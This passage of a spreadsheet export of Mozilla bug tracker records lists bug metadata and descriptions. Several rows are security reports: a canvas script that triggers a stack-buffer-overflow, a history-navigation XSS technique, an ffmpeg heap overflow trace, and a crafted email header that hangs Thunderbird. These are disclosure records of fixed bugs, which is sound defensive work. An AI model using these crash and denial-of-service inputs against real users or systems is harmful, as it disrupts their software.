      <c r="W5330" t="inlineStr">
        <is>
          <t>Created attachment 685817
repro case
&lt;html&gt;
  &lt;head&gt;
    &lt;script&gt;
        setTimeout("location.reload()", 1000)
        el18=document.createElement('canvas')
        ctx=el18.getContext('2d')
        ctx.shadowColor = 'black'
        ctx.shadowBlur = 8
        ctx.globalAlpha=0
        ctx.miterLimit=0
        ctx.strokeStyle=ctx.createLinearGradient(0, 0, 0, 0)
        ctx.beginPath()
        ctx.arc(50, 80, 125, 0.1, -1, false)
        ctx.scale(0.0055, 1)
        document.implementation.createDocument('' ,'' ,null).adoptNode(el18)
        var imgxz= new Image()
        imgxz.src = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAHElEQVQI12P4//8/w38GIAXDIBKE0DHxgljNBAAO9TXL0Y4OHwAAAABJRU5ErkJggg=='
        ctx.fillStyle=ctx.createPattern(imgxz,'')
        ctx.fill('', 0, 0)
    &lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
  &lt;/body&gt;
&lt;/html&gt;
results in:
==3262== ERROR: AddressSanitizer stack-buffer-overflow on address 0x7fffffff2c9c at pc 0x7ffff0388727 bp 0x7fffffff2990 sp 0x7fffffff2988
READ of size 4 at 0x7fffffff2c9c thread T0
    #0 0x7ffff0388726 in fast_composite_scaled_bilinear_sse2_8888_8_8888_normal_OVER /builds/slave/try-lnx64/build/gfx/cairo/libpixman/src/pixman-sse2.c:5725
    #1 0x7ffff02d8d97 in _moz_pixman_image_composite32 /builds/slave/try-lnx64/build/gfx/cairo/libpixman/src/pixman.c:712
    #2 0x7ffff026227e in _composite_spans /builds/slave/try-lnx64/build/gfx/cairo/cairo/src/cairo-image-surface.c:3496
Address 0x7fffffff2c9c is located at offset 220 in frame &lt;fast_composite_scaled_bilinear_sse2_8888_8_8888_normal_OVER&gt; of T0's stack:
  This frame has 5 object(s):
    [32, 44) 'v'
    [96, 104) 'buf1'
    [160, 168) 'buf2'
    [224, 736) 'extended_src_line0'
    [768, 1280) 'extended_src_line1'</t>
        </is>
      </c>
      <c r="X5330" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5331">
      <c r="A5331" t="n">
        <v>1271719</v>
      </c>
      <c r="B5331" t="inlineStr">
        <is>
          <t>2016-05-10 10:27:15 -0700</t>
        </is>
      </c>
      <c r="C5331" t="inlineStr">
        <is>
          <t>Firefox Engagement Ratio Spark job is failing</t>
        </is>
      </c>
      <c r="D5331" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E5331" t="n">
        <v>1</v>
      </c>
      <c r="F5331" t="n">
        <v>1</v>
      </c>
      <c r="G5331" t="n">
        <v>6</v>
      </c>
      <c r="H5331" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5331" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J5331" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K5331" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5331" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5331" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5331" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5331" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5331" t="inlineStr"/>
      <c r="Q5331" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5331" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5331" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5331" t="n">
        <v>1</v>
      </c>
      <c r="U5331" t="n">
        <v>0</v>
      </c>
      <c r="V5331" t="n">
        <v>3</v>
      </c>
      <c r="W5331" t="inlineStr">
        <is>
          <t>Figure out why, fix it.</t>
        </is>
      </c>
      <c r="X5331" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5332">
      <c r="A5332" t="n">
        <v>1023871</v>
      </c>
      <c r="B5332" t="inlineStr">
        <is>
          <t>2014-06-11 06:50:32 -0700</t>
        </is>
      </c>
      <c r="C5332" t="inlineStr">
        <is>
          <t>Treeherder job metadata panel contains malformed markup for some TinderboxPrint stats</t>
        </is>
      </c>
      <c r="D5332" t="inlineStr">
        <is>
          <t>2014-08-03 13:29:37 -0700</t>
        </is>
      </c>
      <c r="E5332" t="n">
        <v>1</v>
      </c>
      <c r="F5332" t="n">
        <v>1</v>
      </c>
      <c r="G5332" t="n">
        <v>7</v>
      </c>
      <c r="H5332" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5332" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5332" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5332" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5332" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5332" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5332" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5332" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5332" t="inlineStr"/>
      <c r="Q5332" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5332" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5332" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5332" t="n">
        <v>1</v>
      </c>
      <c r="U5332" t="n">
        <v>0</v>
      </c>
      <c r="V5332" t="n">
        <v>9</v>
      </c>
      <c r="W5332" t="inlineStr">
        <is>
          <t>(I'll move this to the new treeherder component, once created)
Looking at:
http://treeherder-dev.allizom.org/ui/#/jobs?repo=mozilla-central&amp;revision=75377bac231e
And clicking the Windows XP pgo build ("B"), the panel in the bottom of the treeherder UI that shows the job stats, lists:
{
    Machine name: b-2008-ix-0162
    Build: x86 windowsxp win
    Duration: 201 minutes
    Job Name: Build
    Machine : x86 win
    Start time: 6/11/14 3:30 AM
    linker max vsize 3006025728
    &lt;a title="libxul_link" href='http://graphs.mozilla.org/graph.html#tests=[[205,1,8]]'&gt;libxul_link:3006025728&lt;/a&gt;
    check 4483/0
}
... where the first "3006025728" is linked to:
http://treeherder-dev.allizom.org/ui/3006025728
...which 404s.
And this line is escaped and thus not clickable:
&lt;a title="libxul_link" href='http://graphs.mozilla.org/graph.html#tests=[[205,1,8]]'&gt;libxul_link:3006025728&lt;/a&gt;</t>
        </is>
      </c>
      <c r="X5332" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5333">
      <c r="A5333" t="n">
        <v>1493903</v>
      </c>
      <c r="B5333" t="inlineStr">
        <is>
          <t>2018-09-25 01:40:49 -0700</t>
        </is>
      </c>
      <c r="C5333" t="inlineStr">
        <is>
          <t>Infoleak bug from Hack2Win</t>
        </is>
      </c>
      <c r="D5333" t="inlineStr">
        <is>
          <t>2018-10-25 08:55:46 -0700</t>
        </is>
      </c>
      <c r="E5333" t="n">
        <v>1</v>
      </c>
      <c r="F5333" t="n">
        <v>1</v>
      </c>
      <c r="G5333" t="n">
        <v>3</v>
      </c>
      <c r="H5333" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5333" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5333" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5333" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5333" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5333" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5333" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5333" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5333" t="inlineStr"/>
      <c r="Q5333" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5333" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5333" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T5333" t="n">
        <v>1</v>
      </c>
      <c r="U5333" t="n">
        <v>0</v>
      </c>
      <c r="V5333" t="n">
        <v>31</v>
      </c>
      <c r="W5333" t="inlineStr">
        <is>
          <t>Created attachment 9011709
writeups_fifo_leak.pdf
We received the 2018 Hack2Win Firefox Infoleak exploit from Noam Rathaus of Beyond Security.
Please use the following for the acknowledgement.
"Two independent security researcher, Bruno Keith and Niklas Baumstark,
have reported this vulnerability to Beyond Security’s SecuriTeam Secure
Disclosure program."</t>
        </is>
      </c>
      <c r="X5333" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5334">
      <c r="A5334" t="n">
        <v>1126332</v>
      </c>
      <c r="B5334" t="inlineStr">
        <is>
          <t>2015-01-27 07:45:27 -0800</t>
        </is>
      </c>
      <c r="C5334" t="inlineStr">
        <is>
          <t>Firefox crash in mozilla::MediaCacheStream::BlockList::RemoveBlock(int)</t>
        </is>
      </c>
      <c r="D5334" t="inlineStr">
        <is>
          <t>2016-01-28 17:16:57 -0800</t>
        </is>
      </c>
      <c r="E5334" t="n">
        <v>1</v>
      </c>
      <c r="F5334" t="n">
        <v>1</v>
      </c>
      <c r="G5334" t="n">
        <v>3</v>
      </c>
      <c r="H5334" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5334" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5334" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K5334" t="inlineStr">
        <is>
          <t>36 Branch</t>
        </is>
      </c>
      <c r="L5334" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5334" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5334" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5334" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5334" t="inlineStr"/>
      <c r="Q5334" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5334" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5334" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5334" t="n">
        <v>1</v>
      </c>
      <c r="U5334" t="n">
        <v>0</v>
      </c>
      <c r="V5334" t="n">
        <v>12</v>
      </c>
      <c r="W5334" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-67c2194a-8ab9-46e8-877f-fd2ae2150125.
=============================================================
Seen while looking at crash stats - this seems to have affected the Beta 3 according to the Build IDs (20150122214638). I can't get the full roll up of the URLs, but some I did click on were youtube and some were other media sites.
All crashes across branches: https://crash-stats.mozilla.com/report/list?product=Firefox&amp;signature=mozilla::MediaCacheStream::BlockList::RemoveBlock%28int%29
Frame 	Module 	Signature 	Source
0 	xul.dll 	mozilla::MediaCacheStream::BlockList::RemoveBlock(int) 	dom/media/MediaCache.cpp
1 	xul.dll 	mozilla::MediaCache::NoteBlockUsage(mozilla::MediaCacheStream*, int, mozilla::MediaCacheStream::ReadMode, mozilla::TimeStamp) 	dom/media/MediaCache.cpp
2 	xul.dll 	mozilla::MediaCacheStream::Read(char*, unsigned int, unsigned int*) 	dom/media/MediaCache.cpp
3 	xul.dll 	mozilla::MediaCacheStream::ReadAt(__int64, char*, unsigned int, unsigned int*) 	dom/media/MediaCache.cpp
4 	xul.dll 	mozilla::ChannelMediaResource::ReadAt(__int64, char*, unsigned int, unsigned int*) 	dom/media/MediaResource.cpp
5 	xul.dll 	mozilla::MP4Stream::BlockingReadIntoCache(__int64, unsigned int, mozilla::Monitor*) 	dom/media/fmp4/MP4Stream.cpp
6 	xul.dll 	mozilla::InvokeAndRetry&lt;mp4_demuxer::MP4Demuxer, mp4_demuxer::MP4Sample*&gt;(mp4_demuxer::MP4Demuxer*, mp4_demuxer::MP4Sample* ( mp4_demuxer::MP4Demuxer::*)(void), mozilla::MP4Stream*, mozilla::Monitor*) 	dom/media/fmp4/MP4Reader.cpp
7 	xul.dll 	mozilla::MP4Reader::PopSampleLocked(mp4_demuxer::TrackType) 	dom/media/fmp4/MP4Reader.cpp</t>
        </is>
      </c>
      <c r="X5334" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5335">
      <c r="A5335" t="n">
        <v>282628</v>
      </c>
      <c r="B5335" t="inlineStr">
        <is>
          <t>2005-02-17 12:28:49 -0800</t>
        </is>
      </c>
      <c r="C5335" t="inlineStr">
        <is>
          <t>Move OpenStates and IsOpenedState out of globals.pl</t>
        </is>
      </c>
      <c r="D5335" t="inlineStr">
        <is>
          <t>2006-03-11 11:59:29 -0800</t>
        </is>
      </c>
      <c r="E5335" t="n">
        <v>1</v>
      </c>
      <c r="F5335" t="n">
        <v>1</v>
      </c>
      <c r="G5335" t="n">
        <v>4</v>
      </c>
      <c r="H5335" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5335" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5335" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5335" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L5335" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5335" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5335" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5335" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5335" t="inlineStr"/>
      <c r="Q5335" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5335" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5335" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T5335" t="n">
        <v>1</v>
      </c>
      <c r="U5335" t="n">
        <v>0</v>
      </c>
      <c r="V5335" t="n">
        <v>12</v>
      </c>
      <c r="W5335" t="inlineStr">
        <is>
          <t>IsOpenedState is in globals.pl, and nothing should be in globals.pl. :-)
Also, checksetup uses IsOpenedState, so we want to get it out of globals.pl so
we can remove globals.pl from checksetup.
I think that it will go in Bugzilla::Bug.</t>
        </is>
      </c>
      <c r="X5335" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5336">
      <c r="A5336" t="n">
        <v>775009</v>
      </c>
      <c r="B5336" t="inlineStr">
        <is>
          <t>2012-07-18 00:23:55 -0700</t>
        </is>
      </c>
      <c r="C5336" t="inlineStr">
        <is>
          <t>History state error with late navigation involving a hash change</t>
        </is>
      </c>
      <c r="D5336" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:44 -0700</t>
        </is>
      </c>
      <c r="E5336" t="n">
        <v>1</v>
      </c>
      <c r="F5336" t="n">
        <v>1</v>
      </c>
      <c r="G5336" t="n">
        <v>3</v>
      </c>
      <c r="H5336" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5336" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5336" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5336" t="inlineStr">
        <is>
          <t>14 Branch</t>
        </is>
      </c>
      <c r="L5336" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5336" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5336" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5336" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5336" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5336" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5336" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5336" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T5336" t="n">
        <v>1</v>
      </c>
      <c r="U5336" t="n">
        <v>0</v>
      </c>
      <c r="V5336" t="n">
        <v>36</v>
      </c>
      <c r="W5336" t="inlineStr">
        <is>
          <t>Docshell is still vulnerable to the history state issue described in bug 757376 if the write to location.hash is substituted for a history navigation involving a hash change. Suppose the history object is in the following state:
[0]: http://attacker
[1]: http://attacker#hash (active)
[2]: http://victim
Calling history.forward and history.back in a rapid succession will cause the targeted website to load into the existing session history entry 0:
[0]: http://attacker (active)
[1]: http://attacker#hash
[2]: http://victim
A subsequent call to history.forward changes |baseURI|, which allows the attacker to inject a script loaded from a relative path (XSS) or intercept data posted to a location specified with a relative path.</t>
        </is>
      </c>
      <c r="X5336" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5337">
      <c r="A5337" t="n">
        <v>1501662</v>
      </c>
      <c r="B5337" t="inlineStr">
        <is>
          <t>2018-10-24 06:52:23 -0700</t>
        </is>
      </c>
      <c r="C5337" t="inlineStr">
        <is>
          <t>Add more .eslintrc.js files for test directories</t>
        </is>
      </c>
      <c r="D5337" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E5337" t="n">
        <v>1</v>
      </c>
      <c r="F5337" t="n">
        <v>1</v>
      </c>
      <c r="G5337" t="n">
        <v>7</v>
      </c>
      <c r="H5337" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5337" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J5337" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K5337" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5337" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5337" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5337" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5337" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5337" t="inlineStr"/>
      <c r="Q5337" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5337" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5337" t="inlineStr">
        <is>
          <t>mozilla65</t>
        </is>
      </c>
      <c r="T5337" t="n">
        <v>1</v>
      </c>
      <c r="U5337" t="n">
        <v>0</v>
      </c>
      <c r="V5337" t="n">
        <v>5</v>
      </c>
      <c r="W5337" t="inlineStr">
        <is>
          <t>Unfortunately we haven't got a fix for bug 1415265 yet (which is dependent on ESLint).
In the meantime I'd like to work towards enabling ESLint in more places. Here's some patches that add files for various places in dom, modules, netwerk and parser.
There's also some updates to .eslintignore for good measure.
Still more files to add in dom/ and other top-level directories but I'll do those sometime later.</t>
        </is>
      </c>
      <c r="X5337" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5338">
      <c r="A5338" t="n">
        <v>1289280</v>
      </c>
      <c r="B5338" t="inlineStr">
        <is>
          <t>2016-07-25 21:49:18 -0700</t>
        </is>
      </c>
      <c r="C5338" t="inlineStr">
        <is>
          <t>FFMPEG: heap-buffer-overflow read in [@av_packet_split_side_data]</t>
        </is>
      </c>
      <c r="D5338" t="inlineStr">
        <is>
          <t>2017-02-09 07:56:12 -0800</t>
        </is>
      </c>
      <c r="E5338" t="n">
        <v>1</v>
      </c>
      <c r="F5338" t="n">
        <v>1</v>
      </c>
      <c r="G5338" t="n">
        <v>3</v>
      </c>
      <c r="H5338" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5338" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5338" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K5338" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L5338" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5338" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5338" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5338" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5338" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q5338" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5338" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5338" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T5338" t="n">
        <v>1</v>
      </c>
      <c r="U5338" t="n">
        <v>0</v>
      </c>
      <c r="V5338" t="n">
        <v>34</v>
      </c>
      <c r="W5338" t="inlineStr">
        <is>
          <t>Created attachment 8774601
test_case.webm
I found this while fuzzing a nightly build of the browser not a standalone ffmpeg build.
This could be potentially nasty. I am seeing the following over read but also a much larger on at another location with the same test case. Not sure if it is the same issue or two separate issues.
==6943==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190012f0d44 at pc 0x7fce58a7dcd9 bp 0x7fce514b4c60 sp 0x7fce514b4c58
READ of size 8 at 0x6190012f0d44 thread T57 (MediaPD~oder #1)
    #0 0x7fce58a7dcd8 in av_packet_split_side_data /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/ffvpx/libavcodec/avpacket.c:396:51
    #1 0x7fce58b42baa in avcodec_decode_video2 /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/ffvpx/libavcodec/utils.c:2115:25
    #2 0x7fce8cf4960f in mozilla::FFmpegVideoDecoder&lt;46465650&gt;::DoDecode(mozilla::MediaRawData*, unsigned char*, int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/media/platforms/ffmpeg/FFmpegVideoDecoder.cpp:235:5
    #3 0x7fce8cf48fe1 in mozilla::FFmpegVideoDecoder&lt;46465650&gt;::DoDecode(mozilla::MediaRawData*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/media/platforms/ffmpeg/FFmpegVideoDecoder.cpp:187:17
    #4 0x7fce8cf469af in mozilla::FFmpegDataDecoder&lt;46465650&gt;::ProcessDecode(mozilla::MediaRawData*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/media/platforms/ffmpeg/FFmpegDataDecoder.cpp:122:11
    #5 0x7fce8cf4b6be in applyImpl&lt;mozilla::FFmpegDataDecoder&lt;LIBAV_VER&gt;, void (mozilla::FFmpegDataDecoder&lt;LIBAV_VER&gt;::*)(mozilla::MediaRawData *), StorensRefPtrPassByPtr&lt;mozilla::MediaRawData&gt; , 0&gt; /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:729:12
    #6 0x7fce8cf4b6be in apply&lt;mozilla::FFmpegDataDecoder&lt;LIBAV_VER&gt;, void (mozilla::FFmpegDataDecoder&lt;LIBAV_VER&gt;::*)(mozilla::MediaRawData *)&gt; /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:735
    #7 0x7fce8cf4b6be in mozilla::detail::RunnableMethodImpl&lt;void (mozilla::FFmpegDataDecoder&lt;46465650&gt;::*)(mozilla::MediaRawData*), true, false, RefPtr&lt;mozilla::MediaRawData&gt; &gt;::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:764
...
See log.txt for entire log.</t>
        </is>
      </c>
      <c r="X5338" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5339">
      <c r="A5339" t="n">
        <v>1411720</v>
      </c>
      <c r="B5339" t="inlineStr">
        <is>
          <t>2017-10-25 13:09:39 -0700</t>
        </is>
      </c>
      <c r="C5339" t="inlineStr">
        <is>
          <t>TBE-01-017: Multiple Hangs via malformed Headers</t>
        </is>
      </c>
      <c r="D5339" t="inlineStr">
        <is>
          <t>2020-02-16 17:13:21 -0800</t>
        </is>
      </c>
      <c r="E5339" t="n">
        <v>1</v>
      </c>
      <c r="F5339" t="n">
        <v>1</v>
      </c>
      <c r="G5339" t="n">
        <v>3</v>
      </c>
      <c r="H5339" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5339" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J5339" t="inlineStr">
        <is>
          <t>MIME</t>
        </is>
      </c>
      <c r="K5339" t="inlineStr">
        <is>
          <t>57</t>
        </is>
      </c>
      <c r="L5339" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5339" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5339" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5339" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5339" t="inlineStr"/>
      <c r="Q5339" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5339" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5339" t="inlineStr">
        <is>
          <t>Thunderbird 60.0</t>
        </is>
      </c>
      <c r="T5339" t="n">
        <v>1</v>
      </c>
      <c r="U5339" t="n">
        <v>0</v>
      </c>
      <c r="V5339" t="n">
        <v>15</v>
      </c>
      <c r="W5339" t="inlineStr">
        <is>
          <t>An issue was discovered to let an attacker craft an email which causes the victim’s Thunderbird process to hang on receiving the message. For some test cases, the hang persisted across a restart of the Thunderbird software, thus making it impossible to use the application unless the email was deleted via the mail provider’s web interface. Below is an example of an email culprit.
Email which causes a hang:
Content-Type: text/plain
Subject: HANG!
From: evil@attacker
To: sad@victim
CC: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
meowmeow
Once the email is processed, Thunderbird freezes and consumes 100% of the CPU
resources. Moreover, the amount of used memory increases. This problem is caused by an escaping algorithm which processes the header field in a manner presented next
@@ =&gt; "@"@
@@@ =&gt; "\"@\"@"@
@@@@ =&gt; "\"\\\"@\\\"@\"@"@
@@@@@@ =&gt; "\"\\\"\\\\\\\"\\\\\\\\\\\\\\\"@\\\\\\\\\\\\\\\"@\\\\\\\"@\\\"@\"@"@
Adding @ characters to the header entry increases the length of the encoded string exponentially, thus resulting in high CPU and memory consumption. All header types permitted to contain email addresses, e.g. From, To, BCC, Resent-From, are affected by this issue. It is recommended to review and fix the escaping algorithm to avoid Denial of Service and foster more robust parsing.
For the original report as PDF; see bug 1411701.</t>
        </is>
      </c>
      <c r="X5339" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5340">
      <c r="A5340" t="n">
        <v>760887</v>
      </c>
      <c r="B5340" t="inlineStr">
        <is>
          <t>2012-06-02 19:58:44 -0700</t>
        </is>
      </c>
      <c r="C5340" t="inlineStr">
        <is>
          <t>"ASSERTION: function object has parent of unknown class!"</t>
        </is>
      </c>
      <c r="D5340" t="inlineStr">
        <is>
          <t>2014-01-10 10:42:23 -0800</t>
        </is>
      </c>
      <c r="E5340" t="n">
        <v>1</v>
      </c>
      <c r="F5340" t="n">
        <v>1</v>
      </c>
      <c r="G5340" t="n">
        <v>3</v>
      </c>
      <c r="H5340" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5340" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5340" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5340" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5340" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5340" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5340" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5340" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5340" t="inlineStr">
        <is>
          <t>[adv-track-main17+] fixed by bug 774245</t>
        </is>
      </c>
      <c r="Q5340" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5340" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5340" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5340" t="n">
        <v>1</v>
      </c>
      <c r="U5340" t="n">
        <v>0</v>
      </c>
      <c r="V5340" t="n">
        <v>26</v>
      </c>
      <c r="W5340" t="inlineStr">
        <is>
          <t>Created attachment 629546
testcase
###!!! ASSERTION: function object has parent of unknown class!: 'Error', file js/xpconnect/src/XPCWrappedNative.cpp, line 1779
Smells cpg-related.</t>
        </is>
      </c>
      <c r="X5340" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5341">
      <c r="A5341" t="n">
        <v>665936</v>
      </c>
      <c r="B5341" t="inlineStr">
        <is>
          <t>2011-06-21 09:56:08 -0700</t>
        </is>
      </c>
      <c r="C5341" t="inlineStr">
        <is>
